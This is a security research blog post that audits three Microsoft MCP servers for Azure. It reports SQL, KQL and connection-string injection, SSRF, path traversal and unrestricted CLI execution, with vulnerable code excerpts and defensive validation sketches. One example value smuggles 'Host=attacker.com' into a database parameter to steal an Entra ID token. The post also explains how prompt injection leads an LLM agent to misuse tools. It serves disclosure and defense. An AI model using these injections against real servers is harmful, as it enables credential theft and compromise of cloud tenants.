Microsoft ships three open-source MCP (Model Context Protocol) servers for Azure integration. Combined: 5,400+ GitHub stars, used by developers connecting AI agents to Azure infrastructure.
I audited all three. I found 20+ vulnerabilities across 6 vulnerability classes, including a CVSS 9.8 SQL injection and 7 unpatched variants of a CVE that Microsoft already fixed once.
Every finding has been reported to MSRC. This post covers the patterns and methodology — not exploitation steps. If you maintain MCP servers, the patterns here apply to your code too.
## The Targets
| Repository | Language | Stars | Purpose |
|---|---|---|---|
| Azure/azure-mcp | C# | 1,206 | Azure resource management via MCP |
| microsoft/mcp | C# | 2,781 | Microsoft's broader MCP tools |
| microsoft/azure-devops-mcp | TypeScript | 1,411 | Azure DevOps pipelines, repos, work items |
These aren't toy projects. They connect LLMs to production Azure resources — databases, key vaults, storage accounts, VMs, DevOps pipelines. The blast radius of a vulnerability here is your entire Azure tenant.
## Why MCP Is a New Attack Surface
Traditional tools have a human in the loop. MCP tools have an LLM in the loop.
The difference matters. An LLM processes untrusted data (documents, web pages, code, database records) and decides which tools to call with which parameters. If an attacker can influence that data — and they usually can — they control the tool inputs.
This is the prompt injection → tool misuse chain:
- Attacker plants malicious instructions in data the LLM will process
- The LLM, following the injected instructions, calls an MCP tool with attacker-controlled parameters
- The MCP server executes the operation with its configured credentials (often Azure managed identity)
- The attacker achieves data exfiltration, destruction, or lateral movement
Every vulnerability below follows this chain. The MCP server is the last line of defense — and in most cases, it had no defenses at all.
## Finding 1: SQL Injection in PostgreSQL — But Not MySQL (CVSS 9.8)
This is the finding that tells you the most about how MCP security bugs happen.
The Azure MCP Server has two database services: MySQL and PostgreSQL. Same codebase. Same team. Same architecture. But the MySQL service has a ValidateQuerySafety() method that blocks destructive operations and enforces read-only queries.
The PostgreSQL service has none of that. User-supplied queries go straight to NpgsqlCommand.ExecuteReaderAsync() with zero validation.
Here's the pattern in the Postgres service (simplified):
```csharp
public async Task<List<string>> ExecuteQueryAsync(
    string subscriptionId, string resourceGroup,
    string user, string server, string database,
    string query, CancellationToken cancellationToken)
{
    // ... connection setup ...
    await using var command = new NpgsqlCommand(query, resource.Connection);
    await using var reader = await command.ExecuteReaderAsync();
    // ...
}
```
And the table schema method uses string interpolation for the table name:
```csharp
var query = $"SELECT column_name, data_type FROM information_schema.columns " +
            $"WHERE table_name = '{table}';";
```
Classic SQL injection. The table parameter comes directly from LLM tool input.
Meanwhile, the MySQL service (same repo, same Services/ directory) has keyword blocking, destructive operation detection, and read-only enforcement. Someone built the validation for MySQL, and either forgot to port it to Postgres, or Postgres was added later without the same review.
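For contrast, here is a minimal sketch of the kind of read-only guard the MySQL service applies and the PostgreSQL service lacks. It's written in TypeScript (one of the audited repos' languages), and the keyword list and stripping rules are my own illustration, not the actual ValidateQuerySafety() implementation:

```typescript
// Illustrative read-only query guard. NOT the real Azure MCP code:
// the keyword list and comment/literal stripping are assumptions.
const DESTRUCTIVE_KEYWORDS = [
  "insert", "update", "delete", "drop", "alter", "truncate",
  "create", "grant", "revoke", "merge", "call", "exec",
];

function isReadOnlyQuery(query: string): boolean {
  // Strip string literals and comments first so keywords inside
  // quoted data don't trigger false positives.
  const stripped = query
    .replace(/'([^']|'')*'/g, "''")     // single-quoted literals
    .replace(/--[^\n]*/g, "")           // line comments
    .replace(/\/\*[\s\S]*?\*\//g, "");  // block comments

  const tokens = stripped.toLowerCase().split(/[^a-z_]+/).filter(Boolean);
  // Must start with SELECT and contain no destructive keyword,
  // which also catches stacked queries like "SELECT 1; DELETE ...".
  if (tokens[0] !== "select") return false;
  return !tokens.some((t) => DESTRUCTIVE_KEYWORDS.includes(t));
}
```

A guard like this is defense in depth, not a substitute for parameterized queries: the table-name interpolation above still needs an identifier allowlist.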
The audit lesson: When you find validation in one service, immediately check if sibling services have the same validation. Inconsistency between parallel implementations is one of the highest-signal patterns for finding vulnerabilities.
## Finding 2: 7 Unpatched SSRF Variants of CVE-2026-26118
CVE-2026-26118 was disclosed and patched on March 10, 2026. It was an SSRF in the Azure MCP Server — user-controlled parameters constructed URLs that got Azure managed identity Bearer tokens attached.
The patch fixed the specific service that was reported. But the same pattern exists in at least 7 more services in the same codebase, all unpatched.
The pattern is simple: take a user-supplied name (account name, vault name, cluster URI, service name), interpolate it into a URL template, and make an authenticated request to that URL.
Each Azure service has a well-known URL format. For example:
- Storage: https://{account}.blob.core.windows.net
- KeyVault: https://{vaultName}.vault.azure.net
- Cosmos DB: https://{accountName}.documents.azure.com
- Search: https://{serviceName}.search.windows.net
None of these validate that the input actually matches the expected format. Azure storage account names are 3-24 lowercase alphanumeric characters — but the code accepts any string.
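The missing check is small: validate names against their documented formats before they ever reach a URL template. A TypeScript sketch; the function names are mine, the storage regex follows the 3-24 lowercase alphanumeric rule just mentioned, and the KeyVault rule is my reading of Azure's published naming constraints:

```typescript
// Illustrative name validation before building a credentialed URL.
// The storage rule matches Azure's documented 3-24 lowercase
// alphanumeric format; the vault rule is an assumption.
const NAME_RULES: Record<string, RegExp> = {
  storageAccount: /^[a-z0-9]{3,24}$/,
  keyVault: /^[a-zA-Z](-?[a-zA-Z0-9]){2,23}$/, // 3-24 chars, no "--"
};

function buildStorageUrl(account: string): string {
  if (!NAME_RULES.storageAccount.test(account)) {
    throw new Error(`invalid storage account name: ${account}`);
  }
  return `https://${account}.blob.core.windows.net`;
}
```

With this in place, an injected value like evil.attacker.com fails the regex before any token-bearing request is constructed.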
The services where I confirmed this pattern was unpatched:
- Storage — account name parameter
- KeyVault — vault name parameter
- Cosmos DB — account name parameter
- Kusto — cluster URI parameter (accepts full URLs)
- Search — service name parameter
- Foundry — endpoint parameter (full URL, no validation)
- Monitor — workspace-related parameters
In every case, the server attaches Azure credentials (managed identity tokens or service principal tokens) to the outgoing request. An attacker-controlled URL receives those tokens.
The audit lesson: When a CVE patch fixes one instance of a pattern, search the entire codebase for the same pattern. grep for the URL construction method, the authentication attachment method, or the parameter name pattern. One CVE patch often means N-1 remaining instances.
## Finding 3: Connection String Injection Stealing Entra ID Tokens (CVSS 8.1)
The database services construct connection strings by interpolating parameters:
```csharp
var connectionString = $"Host={host};Database={database};Username={user};" +
                       $"Password={entraIdAccessToken}";
```
The database parameter comes from the LLM. Connection string parsers process parameters sequentially — later values override earlier ones.
If an attacker sets database to postgres;Host=attacker.com;SslMode=Disable, the resulting connection string becomes:
```
Host=legitimate.server;Database=postgres;Host=attacker.com;SslMode=Disable;
Username=user;Password=eyJ0eXAiOiJKV1Q...
```
The second Host= overrides the first. The Entra ID access token — a full JWT that provides access to Azure resources — is sent as the password to the attacker's server.
This works in both Npgsql (PostgreSQL) and MySQL Connector/NET. The NormalizeServerName() function in the code only validates the server parameter, not the database parameter. Even if you lock down server name validation, the injection through database bypasses it entirely.
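One way to close this hole is to refuse delimiter characters in every connection parameter, not just the server name. The sketch below is illustrative; in the real C# code the robust fix is the driver's own builder (NpgsqlConnectionStringBuilder or MySqlConnectionStringBuilder), which escapes values for you:

```typescript
// Illustrative builder that rejects the delimiters used for
// parameter pollution. A real fix should prefer the database
// driver's connection string builder, which escapes values.
function buildConnectionString(params: Record<string, string>): string {
  return Object.entries(params)
    .map(([key, value]) => {
      if (/[;=]/.test(value)) {
        throw new Error(`illegal character in connection parameter "${key}"`);
      }
      return `${key}=${value}`;
    })
    .join(";");
}
```

The key property: the attack string postgres;Host=attacker.com;SslMode=Disable can no longer smuggle a second Host= key, because ";" and "=" are rejected in values outright.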
The audit lesson: Any time user input is concatenated into a structured string format (connection strings, URLs, headers, command arguments), check whether delimiter injection can override earlier values. This class of vulnerability — parameter pollution — is older than SQL injection, and it still shows up everywhere.
## Finding 4: Unrestricted Azure CLI Execution (CVSS 9.1)
The AzCommand tool accepts an arbitrary Azure CLI command string and passes it directly to az CLI execution:
```csharp
var command = options.Command;
// No validation, no allowlist, no blocklist
var result = await _processService.ExecuteAsync(azPath, command, ...);
```
No allowlist. No blocklist. No category restrictions. The tool description tells the LLM to "ALWAYS request user confirmation" — but that confirmation is enforced by the LLM, not by code. A prompt-injected LLM skips the confirmation.
With this tool, an attacker who achieves prompt injection can execute any az CLI command with the configured service principal credentials. That includes commands that delete resource groups, create backdoor service principals, exfiltrate Key Vault secrets, or run arbitrary scripts on virtual machines.
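Real enforcement has to live in server code, not in the tool description. A sketch of what that could look like, with an entirely illustrative allowlist of read-only command groups (not an official Azure recommendation):

```typescript
// Illustrative server-side allowlist for a CLI-execution tool.
// The allowed prefixes here are example read-only az commands.
const ALLOWED_PREFIXES = [
  "account show",
  "group list",
  "vm list",
  "storage account list",
];

function isCommandAllowed(command: string): boolean {
  const normalized = command.trim().replace(/\s+/g, " ").toLowerCase();
  // Reject shell metacharacters outright, before any prefix check.
  if (/[;&|`$<>\\]/.test(normalized)) return false;
  return ALLOWED_PREFIXES.some(
    (p) => normalized === p || normalized.startsWith(p + " ")
  );
}
```

The check runs regardless of what the LLM "decided", so a prompt-injected confirmation skip changes nothing.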
The tool also embeds the service principal clientSecret in process command-line arguments during login, making it visible in process listings.
The audit lesson: "The LLM will ask for confirmation" is not a security control. In the MCP threat model, the LLM is compromised (via prompt injection). Every security check must happen in the MCP server code, not in the LLM's judgment.
## Finding 5: Arbitrary File Write via Path Traversal (CVSS 8.1)
The Azure DevOps MCP Server's pipelines_download_artifact tool accepts a destinationPath parameter:
```typescript
if (destinationPath) {
  const fullDestinationPath = resolve(destinationPath);
  mkdirSync(fullDestinationPath, { recursive: true });
  const fileDestinationPath = join(fullDestinationPath, `${artifactName}.zip`);
  const writeStream = createWriteStream(fileDestinationPath);
  fileStream.pipe(writeStream);
}
```
resolve() normalizes the path but does not restrict it. mkdirSync with recursive: true creates any directory tree. createWriteStream writes to any path.
Both destinationPath and artifactName come from tool parameters (LLM-controlled). An attacker can write files to SSH directories, cron directories, shell profiles, or any other location the MCP server process can access.
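The missing piece is a containment check after normalization. A sketch, assuming the server is configured with an explicit root directory for artifact downloads (the root path here is hypothetical):

```typescript
import { resolve, sep } from "node:path";

// Illustrative containment check: resolve() normalizes but does not
// restrict, so we verify the result stays under the allowed root.
function resolveInside(root: string, userPath: string): string {
  const base = resolve(root);
  const target = resolve(base, userPath);
  if (target !== base && !target.startsWith(base + sep)) {
    throw new Error(`path escapes allowed root: ${userPath}`);
  }
  return target;
}
```

Note the `base + sep` comparison: checking `startsWith(base)` alone would wrongly accept a sibling directory like /tmp/artifacts-evil when the root is /tmp/artifacts.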
The audit lesson: In MCP servers, every tool parameter is attacker-controlled. Path parameters need allowlist-based validation (explicit allowed directories), not just normalization. resolve() and path.join() are not security functions.
## Finding 6: KQL Command Injection (CVSS 7.5)
The Kusto service interpolates table names directly into KQL control commands:
```csharp
var kustoResult = await kustoClient.ExecuteQueryCommandAsync(
    databaseName,
    $".show table {tableName} cslschema", cancellationToken);
```
And into queries:
```csharp
var query = $"{options.Table} | sample {options.Limit}";
```
An attacker-controlled table name can inject KQL operators to exfiltrate data from arbitrary tables, cross-database, with column selection. No escaping functions exist anywhere in the Kusto service code.
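The pragmatic defense is a strict identifier allowlist before interpolation. The regex below is my assumption of a safe subset of Kusto entity names, not an official Kusto rule:

```typescript
// Illustrative allowlist for Kusto entity names before they are
// interpolated into a KQL string. The pattern is an assumed safe
// subset: a leading letter/underscore, then word characters.
const KQL_IDENTIFIER = /^[A-Za-z_][A-Za-z0-9_]{0,99}$/;

function kqlTableRef(table: string): string {
  if (!KQL_IDENTIFIER.test(table)) {
    throw new Error(`invalid Kusto table name: ${table}`);
  }
  return table;
}
```

Anything containing pipes, quotes, parentheses, or whitespace, i.e. everything an injected KQL operator needs, fails the check before query construction.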
The audit lesson: If a service builds queries via string concatenation, check every interpolated parameter. This applies to SQL, KQL, GraphQL, LDAP, shell commands — any query language.
## The Methodology: How to Audit MCP Servers
Here's the systematic approach I used. It works on any MCP server.
### Step 1: Map the Attack Surface
Every MCP tool definition is a potential entry point. List every tool, every parameter, and every parameter type. Focus on:
- String parameters — unbounded input, highest injection risk
- Path parameters — traversal risk
- URL/hostname parameters — SSRF risk
- Query/command parameters — injection risk
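This triage can be partly automated once you've enumerated the tools. A sketch of a name- and type-based risk classifier for tool parameters; the heuristics are mine and intentionally crude, meant as a starting point rather than a scanner:

```typescript
// Illustrative triage heuristics for MCP tool parameters,
// mapping names/types to the risk categories listed above.
type Param = { name: string; type: string };

function classifyParam(p: Param): string[] {
  const risks: string[] = [];
  const n = p.name.toLowerCase();
  if (p.type === "string") risks.push("injection");
  if (/(path|file|dir|dest)/.test(n)) risks.push("path-traversal");
  if (/(url|host|endpoint|server|uri)/.test(n)) risks.push("ssrf");
  if (/(query|command|cmd|script)/.test(n)) risks.push("command-injection");
  return risks;
}
```

Running this over every tool's input schema gives you a ranked worklist for Step 2.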
### Step 2: Trace Data Flow
For each parameter, trace it from the tool handler to where it's used. You're looking for:
- Direct use in queries (SQL, KQL, GraphQL, etc.)
- String interpolation into URLs or connection strings
- File system operations (read, write, mkdir, delete)
- Process execution (exec, spawn, system calls)
- Serialization/deserialization (pickle, YAML, XML)
### Step 3: Check for Validation Asymmetry
This was the highest-yield technique in this audit. When you find validation in one place, check if all parallel code paths have the same validation. The PostgreSQL/MySQL inconsistency and the SSRF patch that only fixed one service both came from this check.
### Step 4: Audit the Trust Model
Who does the code trust? In these servers:
- LLM input was trusted (it shouldn't be — prompt injection makes it attacker-controlled)
- Tool descriptions relied on LLM behavior for security ("always ask for confirmation")
- Credentials were attached to requests built from user input
If security depends on the LLM behaving correctly, it's not security.
### Step 5: Check the CVE History
Search for CVEs in the project. Read each patch. Then search for the same pattern elsewhere in the codebase. A patched CVE is a roadmap to unpatched variants.
## The Bigger Picture
MCP adoption is accelerating. Every major AI coding tool supports it. Developers are connecting LLMs to production infrastructure — databases, cloud APIs, CI/CD pipelines, file systems — through MCP servers.
The security model hasn't caught up. Most MCP servers treat tool inputs as trusted, but in the real threat model, every input is potentially attacker-controlled via prompt injection. We need:
- Input validation at the MCP server layer — not in the LLM
- Least-privilege tool design — read-only by default, destructive actions behind real authorization (not LLM confirmation)
- Output sanitization — tool responses flow back into the LLM context, creating secondary injection vectors
- Allowlist-based parameter validation — account names should match ^[a-z0-9]{3,24}$, paths should be under an allowed root, commands should be from an approved list
Every MCP server with more than 100 stars is worth auditing. The patterns above will appear in most of them.
## Tools
These are the open-source tools I use and maintain for MCP and AI security research:
- ai-injection-guard — Prompt injection detection with 75+ patterns and output scanning. Protect LLM inputs and outputs.
- mcp-security-audit — Connect to any MCP server, enumerate tools, classify risks, scan for injection patterns, produce a scored report.
- agent-safety-mcp — MCP server that ties input validation, decision tracing, and cost controls together for AI agents.
All available on PyPI and GitHub.
Follow @gmanjuu for more AI security research. If you find something, report it responsibly — then write about the patterns.